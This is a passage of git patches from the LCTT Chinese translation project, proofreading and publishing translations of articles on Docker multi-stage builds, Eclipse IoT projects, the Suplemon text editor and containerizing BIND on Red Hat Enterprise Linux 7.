Multi-stage builds in Docker][2] 作为以下示例的基础。 ### 在多阶段构建之前 -关于构建镜像最具挑战性的事情之一是保持镜像体积小巧. `Dockerfile` 中的每条指令都会在镜像中增加一层, 并且在移动到下一层之前, 需要记住清除不需要的构件. 要编写一个非常高效的 `Dockerfile`, 传统上您需要使用 `shell` 技巧和其他逻辑来尽可能地减少层数, 并确保每一层都具有上一层所需的构件, 而不是其他任何东西. -实际上, 有一个 `Dockerfile` 用于开发(其中包含构建应用程序所需的所有内容), 以及另一个用于生产的瘦客户端, 它只包含您的应用程序以及运行它所需的内容. 这被称为"建造者模式". 维护两个 `Dockerfile` 并不理想. +关于构建镜像最具挑战性的事情之一是保持镜像体积小巧。 Dockerfile 中的每条指令都会在镜像中增加一层,并且在移动到下一层之前,需要记住清除不需要的构件。要编写一个非常高效的 Dockerfile,你通常需要使用 shell 技巧和其它方式来尽可能地减少层数,并确保每一层都具有上一层所需的构件,而其它任何东西都不需要。 -下面分别是一个 `Dockerfile.build` 和 遵循上面的构建器模式的 `Dockerfile` 的例子: +实际上最常见的是,有一个 Dockerfile 用于开发(其中包含构建应用程序所需的所有内容),而另一个裁剪过的用于生产环境,它只包含您的应用程序以及运行它所需的内容。这被称为“构建器模式”。但是维护两个 Dockerfile 并不理想。 -`Dockerfile.build`: +下面分别是一个 `Dockerfile.build` 和遵循上面的构建器模式的 `Dockerfile` 的例子: + +`Dockerfile.build`: ``` FROM golang:1.7.3 @@ -21,12 +22,11 @@ RUN go get -d -v golang.org/x/net/html COPY app.go . RUN go get -d -v golang.org/x/net/html \ && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . - ``` -注意这个例子还使用 Bash && 运算符人为地将两个 `RUN` 命令压缩在一起, 以避免在镜像中创建额外的层. 这很容易失败, 很难维护. 例如, 插入另一个命令时, 很容易忘记继续使用 `\` 字符. +注意这个例子还使用 Bash 的 `&&` 运算符人为地将两个 `RUN` 命令压缩在一起,以避免在镜像中创建额外的层。这很容易失败,难以维护。例如,插入另一个命令时,很容易忘记继续使用 `\` 字符。 -`Dockerfile`: +`Dockerfile`: ``` FROM alpine:latest @@ -34,10 +34,9 @@ RUN apk --no-cache add ca-certificates WORKDIR /root/ COPY app . CMD ["./app"] - ``` -`build.sh`: +`build.sh`: ``` #!/bin/sh @@ -54,18 +53,17 @@ echo Building alexellis2/href-counter:latest docker build --no-cache -t alexellis2/href-counter:latest . rm ./app - ``` -当您运行 `build.sh` 脚本时, 它会构建第一个镜像, 从中创建一个容器, 以便将该构件复制出来, 然后构建第二个镜像. 这两个镜像和应用构件会占用您的系统的空间. +当您运行 `build.sh` 脚本时,它会构建第一个镜像,从中创建一个容器,以便将该构件复制出来,然后构建第二个镜像。 这两个镜像会占用您的系统的空间,而你仍然会一个 `app` 构件存放在你的本地磁盘上。 -多阶段构建大大简化了这种情况! +多阶段构建大大简化了这种情况! ### 使用多阶段构建 -在多阶段构建中, 您需要在 `Dockerfile` 中多次使用 `FROM` 声明. 每次 `FROM` 指令可以使用不同的基础镜像, 并且每次 `FROM` 指令都会开始新阶段的构建. 您可以选择将构件从一个阶段复制到另一个阶段, 在最终镜像中, 不会留下您不需要的所有内容. 为了演示这是如何工作的, 让我们调整前一节中的 `Dockerfile` 以使用多阶段构建。 +在多阶段构建中,您需要在 Dockerfile 中多次使用 `FROM` 声明。每次 `FROM` 指令可以使用不同的基础镜像,并且每次 `FROM` 指令都会开始新阶段的构建。您可以选择将构件从一个阶段复制到另一个阶段,在最终镜像中,不会留下您不需要的所有内容。为了演示这是如何工作的,让我们调整前一节中的 Dockerfile 以使用多阶段构建。 -`Dockerfile`: +`Dockerfile`: ``` FROM golang:1.7.3 @@ -79,23 +77,21 @@ RUN apk --no-cache add ca-certificates WORKDIR /root/ COPY --from=0 /go/src/github.com/alexellis/href-counter/app . CMD ["./app"] - ``` -您只需要单一个 `Dockerfile`. 不需要分隔构建脚本. 只需运行 `docker build` . +您只需要单一个 Dockerfile。 不需要另外的构建脚本。只需运行 `docker build` 即可。 ``` $ docker build -t alexellis2/href-counter:latest . - ``` -最终的结果是和以前体积一样小的生产镜像, 复杂性显着降低. 您不需要创建任何中间镜像, 也不需要将任何构件提取到本地系统. +最终的结果是和以前体积一样小的生产镜像,复杂性显著降低。您不需要创建任何中间镜像,也不需要将任何构件提取到本地系统。 + +它是如何工作的呢?第二条 `FROM` 指令以 `alpine:latest` 镜像作为基础开始新的建造阶段。`COPY --from=0` 这一行将刚才前一个阶段产生的构件复制到这个新阶段。Go SDK 和任何中间构件都被留在那里,而不会保存到最终的镜像中。 -它是如何工作的呢? 第二条 `FROM` 指令以 `alpine:latest` 镜像作为基础开始新的建造阶段. `COPY --from=0` 这一行将刚才前一个阶段产生的构件复制到这个新阶段. Go SDK和任何中间构件都被保留下来, 而不是只保存在最终的镜像中. ### 命名您的构建阶段 -默认情况下, 这些阶段没有命名, 您可以通过它们的整数来引用它们, 从第一个 `FROM` 指令的 0 开始. 但是, 您可以通过在 `FROM` 指令中使用 `as ` -来为阶段命名. 以下示例通过命名阶段并在 `COPY` 指令中使用名称来改进前一个示例. 这意味着, 即使您的 `Dockerfile` 中的指令稍后重新排序, `COPY` 也不会中断。 +默认情况下,这些阶段没有命名,您可以通过它们的整数来引用它们,从第一个 `FROM` 指令的 0 开始。但是,你可以通过在 `FROM` 指令中使用 `as ` 来为阶段命名。以下示例通过命名阶段并在 `COPY` 指令中使用名称来改进前一个示例。这意味着,即使您的 `Dockerfile` 中的指令稍后重新排序,`COPY` 也不会出问题。 ``` FROM golang:1.7.3 as builder @@ -111,15 +107,13 @@ COPY --from=builder /go/src/github.com/alexellis/href-counter/app . CMD ["./app"] ``` -> 译者话: 1.此文章系译者第一次翻译英文文档,有描述不清楚或错误的地方,请读者给予反馈(2727586680@qq.com),不胜感激。 -> 译者话: 2.本文只是简单介绍多阶段构建,不够深入,如果读者需要深入了解,请自行查阅相关资料。 -------------------------------------------------------------------------------- -via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages +via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/ -作者:[docker docs ][a] +作者:[docker][a] 译者:[iron0x](https://github.com/iron0x) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From dee1e0950897092a38ca7df349401984e321c5fe Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 22:34:30 +0800 Subject: [PATCH 0496/1627] PUB:20171202 docker - Use multi-stage builds.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @iron0x 文章发布地址: https://linux.cn/article-9133-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/iron0x --- ...stage builds.md => 20171202 docker - Use multi-stage builds.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/20171202 docker - Use multi-stage builds.md => 20171202 docker - Use multi-stage builds.md (100%) diff --git a/translated/tech/20171202 docker - Use multi-stage builds.md b/20171202 docker - Use multi-stage builds.md similarity index 100% rename from translated/tech/20171202 docker - Use multi-stage builds.md rename to 20171202 docker - Use multi-stage builds.md From d56c5a4f6c2bb32ef3d16b833838b1e7d2946857 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 23:30:57 +0800 Subject: [PATCH 0497/1627] PRF:20171020 How Eclipse is advancing IoT development.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @smartgrids 恭喜你,完成了第一篇翻译。我校对发布晚了,抱歉。 --- ...ow Eclipse is advancing IoT development.md | 49 +++++++++++-------- 1 file changed, 28 insertions(+), 21 deletions(-) diff --git a/translated/tech/20171020 How Eclipse is advancing IoT development.md b/translated/tech/20171020 How Eclipse is advancing IoT development.md index 0de4f38ea1..1bc039848d 100644 --- a/translated/tech/20171020 How Eclipse is advancing IoT development.md +++ b/translated/tech/20171020 How Eclipse is advancing IoT development.md @@ -1,43 +1,50 @@ -translated by smartgrids Eclipse 如何助力 IoT 发展 ============================================================ -### 开源组织的模块发开发方式非常适合物联网。 + +> 开源组织的模块化开发方式非常适合物联网。 ![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") + 图片来源: opensource.com -[Eclipse][3] 可能不是第一个去研究物联网的开源组织。但是,远在 IoT 家喻户晓之前,该基金会在 2001 年左右就开始支持开源软件发展商业化。九月 Eclipse 物联网日和 RedMonk 的 [ThingMonk 2017][4] 一块举行,着重强调了 Eclipse 在 [物联网发展][5] 中的重要作用。它现在已经包含了 28 个项目,覆盖了大部分物联网项目需求。会议过程中,我和负责 Eclipse 市场化运作的 [Ian Skerritt][6] 讨论了 Eclipse 的物联网项目以及如何拓展它。 +[Eclipse][3] 可能不是第一个去研究物联网的开源组织。但是,远在 IoT 家喻户晓之前,该基金会在 2001 年左右就开始支持开源软件发展商业化。 + +九月份的 Eclipse 物联网日和 RedMonk 的 [ThingMonk 2017][4] 一块举行,着重强调了 Eclipse 在 [物联网发展][5] 中的重要作用。它现在已经包含了 28 个项目,覆盖了大部分物联网项目需求。会议过程中,我和负责 Eclipse 市场化运作的 [Ian Skerritt][6] 讨论了 Eclipse 的物联网项目以及如何拓展它。 + +### 物联网的最新进展? -###物联网的最新进展? 我问 Ian 物联网同传统工业自动化,也就是前几十年通过传感器和相应工具来实现工厂互联的方式有什么不同。 Ian 指出很多工厂是还没有互联的。 -另外,他说“ SCADA[监控和数据分析] 系统以及工厂底层技术都是私有、独立性的。我们很难去改变它,也很难去适配它们…… 现在,如果你想运行一套生产系统,你需要设计成百上千的单元。生产线想要的是满足用户需求,使制造过程更灵活,从而可以不断产出。” 这也就是物联网会带给制造业的一个很大的帮助。 +另外,他说 “SCADA [监控和数据分析supervisory control and data analysis] 系统以及工厂底层技术都是非常私有的、独立性的。我们很难去改变它,也很难去适配它们 …… 现在,如果你想运行一套生产系统,你需要设计成百上千的单元。生产线想要的是满足用户需求,使制造过程更灵活,从而可以不断产出。” 这也就是物联网会带给制造业的一个很大的帮助。 -###Eclipse 物联网方面的研究 -Ian 对于 Eclipse 在物联网的研究是这样描述的:“满足任何物联网解决方案的核心基础技术” ,通过使用开源技术,“每个人都可以使用从而可以获得更好的适配性。” 他说,Eclipse 将物联网视为包括三层互联的软件栈。从更高的层面上看,这些软件栈(按照大家常见的说法)将物联网描述为跨越三个层面的网络。特定的观念可能认为含有更多的层面,但是他们一直符合这个三层模型的功能的: +### Eclipse 物联网方面的研究 + +Ian 对于 Eclipse 在物联网的研究是这样描述的:“满足任何物联网解决方案的核心基础技术” ,通过使用开源技术,“每个人都可以使用,从而可以获得更好的适配性。” 他说,Eclipse 将物联网视为包括三层互联的软件栈。从更高的层面上看,这些软件栈(按照大家常见的说法)将物联网描述为跨越三个层面的网络。特定的实现方式可能含有更多的层,但是它们一般都可以映射到这个三层模型的功能上: * 一种可以装载设备(例如设备、终端、微控制器、传感器)用软件的堆栈。 -* 将不同的传感器采集到的数据信息聚合起来并传输到网上的一类网关。这一层也可能会针对传感器数据检测做出实时反映。 +* 将不同的传感器采集到的数据信息聚合起来并传输到网上的一类网关。这一层也可能会针对传感器数据检测做出实时反应。 * 物联网平台后端的一个软件栈。这个后端云存储数据并能根据采集的数据比如历史趋势、预测分析提供服务。 -这三个软件栈在 Eclipse 的白皮书 “ [The Three Software Stacks Required for IoT Architectures][7] ”中有更详细的描述。 +这三个软件栈在 Eclipse 的白皮书 “[The Three Software Stacks Required for IoT Architectures][7] ”中有更详细的描述。 -Ian 说在这些架构中开发一种解决方案时,“需要开发一些特殊的东西,但是很多底层的技术是可以借用的,像通信协议、网关服务。需要一种模块化的方式来满足不用的需求场合。” Eclipse 关于物联网方面的研究可以概括为:开发模块化开源组件从而可以被用于开发大量的特定性商业服务和解决方案。 +Ian 说在这些架构中开发一种解决方案时,“需要开发一些特殊的东西,但是很多底层的技术是可以借用的,像通信协议、网关服务。需要一种模块化的方式来满足不同的需求场合。” Eclipse 关于物联网方面的研究可以概括为:开发模块化开源组件,从而可以被用于开发大量的特定性商业服务和解决方案。 -###Eclipse 的物联网项目 +### Eclipse 的物联网项目 -在众多一杯应用的 Eclipse 物联网应用中, Ian 举了两个和 [MQTT][8] 有关联的突出应用,一个设备与设备互联(M2M)的物联网协议。 Ian 把它描述成“一个专为重视电源管理工作的油气传输线监控系统的信息发布/订阅协议。MQTT 已经是众多物联网广泛应用标准中很成功的一个。” [Eclipse Mosquitto][9] 是 MQTT 的代理,[Eclipse Paho][10] 是他的客户端。 -[Eclipse Kura][11] 是一个物联网网关,引用 Ian 的话,“它连接了很多不同的协议间的联系”包括蓝牙、Modbus、CANbus 和 OPC 统一架构协议,以及一直在不断添加的协议。一个优势就是,他说,取代了你自己写你自己的协议, Kura 提供了这个功能并将你通过卫星、网络或其他设备连接到网络。”另外它也提供了防火墙配置、网络延时以及其它功能。Ian 也指出“如果网络不通时,它会存储信息直到网络恢复。” +在众多已被应用的 Eclipse 物联网应用中, Ian 举了两个和 [MQTT][8] 有关联的突出应用,一个设备与设备互联(M2M)的物联网协议。 Ian 把它描述成“一个专为重视电源管理工作的油气传输线监控系统的信息发布/订阅协议。MQTT 已经是众多物联网广泛应用标准中很成功的一个。” [Eclipse Mosquitto][9] 是 MQTT 的代理,[Eclipse Paho][10] 是他的客户端。 + +[Eclipse Kura][11] 是一个物联网网关,引用 Ian 的话,“它连接了很多不同的协议间的联系”,包括蓝牙、Modbus、CANbus 和 OPC 统一架构协议,以及一直在不断添加的各种协议。他说,一个优势就是,取代了你自己写你自己的协议, Kura 提供了这个功能并将你通过卫星、网络或其他设备连接到网络。”另外它也提供了防火墙配置、网络延时以及其它功能。Ian 也指出“如果网络不通时,它会存储信息直到网络恢复。” 最新的一个项目中,[Eclipse Kapua][12] 正尝试通过微服务来为物联网云平台提供不同的服务。比如,它集成了通信、汇聚、管理、存储和分析功能。Ian 说“它正在不断前进,虽然还没被完全开发出来,但是 Eurotech 和 RedHat 在这个项目上非常积极。” -Ian 说 [Eclipse hawkBit][13] ,软件更新管理的软件,是一项“非常有趣的项目。从安全的角度说,如果你不能更新你的设备,你将会面临巨大的安全漏洞。”很多物联网安全事故都和无法更新的设备有关,他说,“ HawkBit 可以基本负责通过物联网系统来完成扩展性更新的后端管理。” -物联网设备软件升级的难度一直被看作是难度最高的安全挑战之一。物联网设备不是一直连接的,而且数目众多,再加上首先设备的更新程序很难完全正常。正因为这个原因,关于无赖女王软件升级的项目一直是被当作重要内容往前推进。 +Ian 说 [Eclipse hawkBit][13] ,一个软件更新管理的软件,是一项“非常有趣的项目。从安全的角度说,如果你不能更新你的设备,你将会面临巨大的安全漏洞。”很多物联网安全事故都和无法更新的设备有关,他说,“HawkBit 可以基本负责通过物联网系统来完成扩展性更新的后端管理。” -###为什么物联网这么适合 Eclipse +物联网设备软件升级的难度一直被看作是难度最高的安全挑战之一。物联网设备不是一直连接的,而且数目众多,再加上首先设备的更新程序很难完全正常。正因为这个原因,关于 IoT 软件升级的项目一直是被当作重要内容往前推进。 -在物联网发展趋势中的一个方面就是关于构建模块来解决商业问题,而不是宽约工业和公司的大物联网平台。 Eclipse 关于物联网的研究放在一系列模块栈、提供特定和大众化需求功能的项目,还有就是指定目标所需的可捆绑式中间件、网关和协议组件上。 +### 为什么物联网这么适合 Eclipse + +在物联网发展趋势中的一个方面就是关于构建模块来解决商业问题,而不是跨越行业和公司的大物联网平台。 Eclipse 关于物联网的研究放在一系列模块栈、提供特定和大众化需求功能的项目上,还有就是指定目标所需的可捆绑式中间件、网关和协议组件上。 -------------------------------------------------------------------------------- @@ -46,15 +53,15 @@ Ian 说 [Eclipse hawkBit][13] ,软件更新管理的软件,是一项“非 作者简介: -Gordon Haff - Gordon Haff 是红帽公司的云营销员,经常在消费者和工业会议上讲话,并且帮助发展红帽全办公云解决方案。他是 计算机前言:云如何如何打开众多出版社未来之门 的作者。在红帽之前, Gordon 写了成百上千的研究报告,经常被引用到公众刊物上,像纽约时报关于 IT 的议题和产品建议等…… +Gordon Haff - Gordon Haff 是红帽公司的云专家,经常在消费者和行业会议上讲话,并且帮助发展红帽全面云化解决方案。他是《计算机前沿:云如何如何打开众多出版社未来之门》的作者。在红帽之前, Gordon 写了成百上千的研究报告,经常被引用到公众刊物上,像纽约时报关于 IT 的议题和产品建议等…… -------------------------------------------------------------------------------- -转自: https://opensource.com/article/17/10/eclipse-and-iot +via: https://opensource.com/article/17/10/eclipse-and-iot -作者:[Gordon Haff ][a] +作者:[Gordon Haff][a] 译者:[smartgrids](https://github.com/smartgrids) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c4113a6fd3c22a7189d46b91a419a760a7a3a543 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 23:31:48 +0800 Subject: [PATCH 0498/1627] PUB:20171020 How Eclipse is advancing IoT development.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @smartgrids 文章发布地址:https://linux.cn/article-9134-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/smartgrids --- .../20171020 How Eclipse is advancing IoT development.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171020 How Eclipse is advancing IoT development.md (100%) diff --git a/translated/tech/20171020 How Eclipse is advancing IoT development.md b/published/20171020 How Eclipse is advancing IoT development.md similarity index 100% rename from translated/tech/20171020 How Eclipse is advancing IoT development.md rename to published/20171020 How Eclipse is advancing IoT development.md From 29c91769295258db847d551bba4f3cc45e29b237 Mon Sep 17 00:00:00 2001 From: geekpi Date: Tue, 12 Dec 2017 09:01:53 +0800 Subject: [PATCH 0499/1627] translated --- ...I Text Editor with Multi Cursor Support.md | 153 ------------------ ...I Text Editor with Multi Cursor Support.md | 151 +++++++++++++++++ 2 files changed, 151 insertions(+), 153 deletions(-) delete mode 100644 sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md create mode 100644 translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md diff --git a/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md deleted file mode 100644 index 6f0703cd08..0000000000 --- a/sources/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md +++ /dev/null @@ -1,153 +0,0 @@ -translating---geekpi - -Suplemon - Modern CLI Text Editor with Multi Cursor Support -====== -Suplemon is a modern text editor for CLI that emulates the multi cursor behavior and other features of [Sublime Text][1]. It's lightweight and really easy to use, just as Nano is. - -One of the benefits of using a CLI editor is that you can use it whether the Linux distribution that you're using has a GUI or not. This type of text editors also stands out as being simple, fast and powerful. - -You can find useful information and the source code in the [official repository][2]. - -### Features - -These are some of its interesting features: - -* Multi cursor support - -* Undo / Redo - -* Copy and Paste, with multi line support - -* Mouse support - -* Extensions - -* Find, find all, find next - -* Syntax highlighting - -* Autocomplete - -* Custom keyboard shortcuts - -### Installation - -First, make sure you have the latest version of python3 and pip3 installed. - -Then type in a terminal: - -``` -$ sudo pip3 install suplemon -``` - -Create a new file in the current directory - -Open a terminal and type: - -``` -$ suplemon -``` - -![suplemon new file](https://linoxide.com/wp-content/uploads/2017/11/suplemon-new-file.png) - -Open one or multiple files - -Open a terminal and type: - -``` -$ suplemon ... -``` - -``` -$ suplemon example1.c example2.c -``` - -Main configuration - -You can find the configuration file at ~/.config/suplemon/suplemon-config.json. - -Editing this file is easy, you just have to enter command mode (once you are inside suplemon) and run the config command. You can view the default configuration by running config defaults. - -Keymap configuration - -I'll show you the default key mappings for suplemon. If you want to edit them, just run keymap command. Run keymap default to view the default keymap file. - -* Exit: Ctrl + Q - -* Copy line(s) to buffer: Ctrl + C - -* Cut line(s) to buffer: Ctrl + X - -* Insert buffer: Ctrl + V - -* Duplicate line: Ctrl + K - -* Goto: Ctrl + G. You can go to a line or to a file (just type the beginning of a file name). Also, it is possible to type something like 'exam:50' to go to the line 50 of the file example.c at line 50. - -* Search for string or regular expression: Ctrl + F - -* Search next: Ctrl + D - -* Trim whitespace: Ctrl + T - -* Add new cursor in arrow direction: Alt + Arrow key - -* Jump to previous or next word or line: Ctrl + Left / Right - -* Revert to single cursor / Cancel input prompt: Esc - -* Move line(s) up / down: Page Up / Page Down - -* Save file: Ctrl + S - -* Save file with new name: F1 - -* Reload current file: F2 - -* Open file: Ctrl + O - -* Close file: Ctrl + W - -* Switch to next/previous file: Ctrl + Page Up / Ctrl + Page Down - -* Run a command: Ctrl + E - -* Undo: Ctrl + Z - -* Redo: Ctrl + Y - -* Toggle visible whitespace: F7 - -* Toggle mouse mode: F8 - -* Toggle line numbers: F9 - -* Toggle Full screen: F11 - -Mouse shortcuts - -* Set cursor at pointer position: Left Click - -* Add a cursor at pointer position: Right Click - -* Scroll vertically: Scroll Wheel Up / Down - -### Wrapping up - -After trying Suplemon for some time, I have changed my opinion about CLI text editors. I had tried Nano before, and yes, I liked its simplicity, but its modern-feature lack made it non-practical for my everyday use. - -This tool has the best of both CLI and GUI worlds... Simplicity and feature-richness! So I suggest you give it a try, and write your thoughts in the comments :-) - --------------------------------------------------------------------------------- - -via: https://linoxide.com/tools/suplemon-cli-text-editor-multi-cursor/ - -作者:[Ivo Ursino][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://linoxide.com/author/ursinov/ -[1]:https://linoxide.com/tools/install-sublime-text-editor-linux/ -[2]:https://github.com/richrd/suplemon/ diff --git a/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md new file mode 100644 index 0000000000..4fc430ff2a --- /dev/null +++ b/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md @@ -0,0 +1,151 @@ +Suplemon - 带有多光标支持的现代 CLI 文本编辑器 +====== +Suplemon 是一个 CLI 中的现代文本编辑器,它模拟 [Sublime Text][1] 的多光标行为和其他特性。它是轻量级的,非常易于使用,就像 Nano 一样。 + +使用 CLI 编辑器的好处之一是,无论你使用的 Linux 发行版是否有 GUI,你都可以使用它。这种文本编辑器也很简单、快速和强大。 + +你可以在[官方仓库][2]中找到有用的信息和源代码。 + +### 功能 + +这些事一些它有趣的功能: + +* 多光标支持 + +* 撤销/重做 + +* 复制和粘贴,带有多行支持 + +* 鼠标支持 + +* 扩展 + +* 查找、查找所有、查找下一个 + +* 语法高亮 + +* 自动完成 + +* 自定义键盘快捷键 + +### 安装 + +首先,确保安装了最新版本的 python3 和 pip3。 + +然后在终端输入: + +``` +$ sudo pip3 install suplemon +``` + +在当前目录中创建一个新文件 + +打开一个终端并输入: + +``` +$ suplemon +``` + +![suplemon new file](https://linoxide.com/wp-content/uploads/2017/11/suplemon-new-file.png) + +打开一个或多个文件 + +打开一个终端并输入: + +``` +$ suplemon ... +``` + +``` +$ suplemon example1.c example2.c +``` + +主要配置 + +你可以在这 ~/.config/suplemon/suplemon-config.json 找到配置文件。 + +编辑这个文件很简单,你只需要进入命令模式(进入 suplemon 后)并运行 config 命令。你可以通过运行 config defaults 来查看默认配置。 + +键盘映射配置 + +我会展示 suplemon 的默认键映射。如果你想编辑它们,只需运行 keymap 命令。运行 keymap default 来查看默认的键盘映射文件。 + +* 退出: Ctrl + Q + +* 复制行到缓冲区:Ctrl + C + +* 剪切行缓冲区: Ctrl + X + +* 插入缓冲区: Ctrl + V + +* 复制行: Ctrl + K + +* 跳转: Ctrl + G。 你可以跳转到一行或一个文件(只需键入一个文件名的开头)。另外,可以输入类似于 “exam:50” 跳转到 example.c 的第 50行。 + +* 用字符串或正则表达式搜索: Ctrl + F + +* 搜索下一个: Ctrl + D + +* 去除空格: Ctrl + T + +* 在箭头方向添加新的光标: Alt + 方向键 + +* 跳转到上一个或下一个单词或行: Ctrl + 左/右 + +* 恢复到单光标/取消输入提示: Esc + +* 向上/向下移动行: Page Up / Page Down + +* 保存文件:Ctrl + S + +* 用新名称保存文件:F1 + +* 重新载入当前文件:F2 + +* 打开文件:Ctrl + O + +* Close file: 关闭文件: + +* 切换到下一个/上一个文件:Ctrl + Page Up / Ctrl + Page Down + +* 运行一个命令:Ctrl + E + +* 撤消:Ctrl + Z + +* 重做:Ctrl + Y + +* 触发可见的空格:F7 + +* 切换鼠标模式:F8 + +* 显示行号:F9 + +* 显示全屏:F11 + +鼠标快捷键 + +* 将光标置于指针位置:左键单击 + +* 在指针位置添加一个光标:右键单击 + +* 垂直滚动:向上/向下滚动滚轮 + +### 总结 + +在尝试 Suplemon 一段时间后,我改变了对 CLI 文本编辑的看法。我以前曾经尝试过 Nano,是的,我喜欢它的简单性,但是它的现代特征的缺乏使它在日常使用中变得不实用。 + +这个工具有 CLI 和 GUI 世界最好的东西。。。简单性和功能丰富!所以我建议你试试看,并在评论中写下你的想法 :-) + +-------------------------------------------------------------------------------- + +via: https://linoxide.com/tools/suplemon-cli-text-editor-multi-cursor/ + +作者:[Ivo Ursino][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linoxide.com/author/ursinov/ +[1]:https://linoxide.com/tools/install-sublime-text-editor-linux/ +[2]:https://github.com/richrd/suplemon/ From 88506024bffc72f3457855c5875ed8e57e978232 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 12 Dec 2017 12:02:14 +0800 Subject: [PATCH 0500/1627] =?UTF-8?q?PRF:20170719=20Containing=20System=20?= =?UTF-8?q?Services=20in=20Red=20Hat=20Enterprise=20Linux=20=E2=80=93=20Pa?= =?UTF-8?q?rt=201.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @liuxinyu123 恭喜你,完成了第一篇翻译。以后要注意保持 MD 格式,以及中文标点。 --- ...es in Red Hat Enterprise Linux – Part 1.md | 179 ++++++++++-------- 1 file changed, 98 insertions(+), 81 deletions(-) diff --git a/translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md b/translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md index f2dde64cf4..93817695a4 100644 --- a/translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md +++ b/translated/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md @@ -1,18 +1,25 @@ -# 红帽企业版 Linux 包含的系统服务 - 第一部分 +在红帽企业版 Linux 中将系统服务容器化(一) +==================== -在 2017 年红帽峰会上,有几个人问我“我们通常用完整的虚拟机来隔离如 DSN 和 DHCP 等网络服务,那我们可以用容器来取而代之吗?”。答案是可以的,下面是在当前红帽企业版 Linux 7 系统上创建一个系统容器的例子。 -## **我们的目的** -### *创建一个可以独立于任何其他系统服务来进行更新的网络服务,并且可以从主机端容易管理和更新。* -让我们来探究在一个容器中建立一个运行在 systemd 之下的 BIND 服务器。在这一部分,我们将看到建立自己的容器以及管理 BIND 配置和数据文件。 -在第二部分,我们将看到主机中的 systemd 怎样和容器中的 systmed 整合。我们将探究管理容器中的服务,并且使它作为一种主机中的服务。 -## **创建 BIND 容器** -为了使 systemd 在一个容器中容易运行,我们首先需要在主机中增加两个包:`oci-register-machine` 和 `oci-systemd-hook`。`oci-systemd-hook` 这个钩子允许我们在一个容器中运行 systemd,而不需要使用特权容器或者手工配置 tmpfs 和 cgroups。`oci-register-machine` 这个钩子允许我们使用 systemd 工具如 `systemctl` 和 `machinectl` 来跟踪容器。 +在 2017 年红帽峰会上,有几个人问我“我们通常用完整的虚拟机来隔离如 DNS 和 DHCP 等网络服务,那我们可以用容器来取而代之吗?”答案是可以的,下面是在当前红帽企业版 Linux 7 系统上创建一个系统容器的例子。 + +### 我们的目的 + +**创建一个可以独立于任何其它系统服务而更新的网络服务,并且可以从主机端容易地管理和更新。** + +让我们来探究一下在容器中建立一个运行在 systemd 之下的 BIND 服务器。在这一部分,我们将了解到如何建立自己的容器以及管理 BIND 配置和数据文件。 + +在本系列的第二部分,我们将看到如何整合主机中的 systemd 和容器中的 systemd。我们将探究如何管理容器中的服务,并且使它作为一种主机中的服务。 + +### 创建 BIND 容器 + +为了使 systemd 在一个容器中轻松运行,我们首先需要在主机中增加两个包:`oci-register-machine` 和 `oci-systemd-hook`。`oci-systemd-hook` 这个钩子允许我们在一个容器中运行 systemd,而不需要使用特权容器或者手工配置 tmpfs 和 cgroups。`oci-register-machine` 这个钩子允许我们使用 systemd 工具如 `systemctl` 和 `machinectl` 来跟踪容器。 ``` [root@rhel7-host ~]# yum install oci-register-machine oci-systemd-hook -``` +``` -回到创建我们的 BIND 容器上。[红帽企业版 Linux 7 基础映像](https://access.redhat.com/containers)包含 systemd 作为一个 init 系统。我们安装并激活 BIND 正如我们在典型系统中做的那样。你可以从资源库中的 [git 仓库中下载这份 Dockerfile](http://rhelblog.redhat.com/2017/07/19/containing-system-services-in-red-hat-enterprise-linux-part-1/#repo)。 +回到创建我们的 BIND 容器上。[红帽企业版 Linux 7 基础镜像][6]包含了 systemd 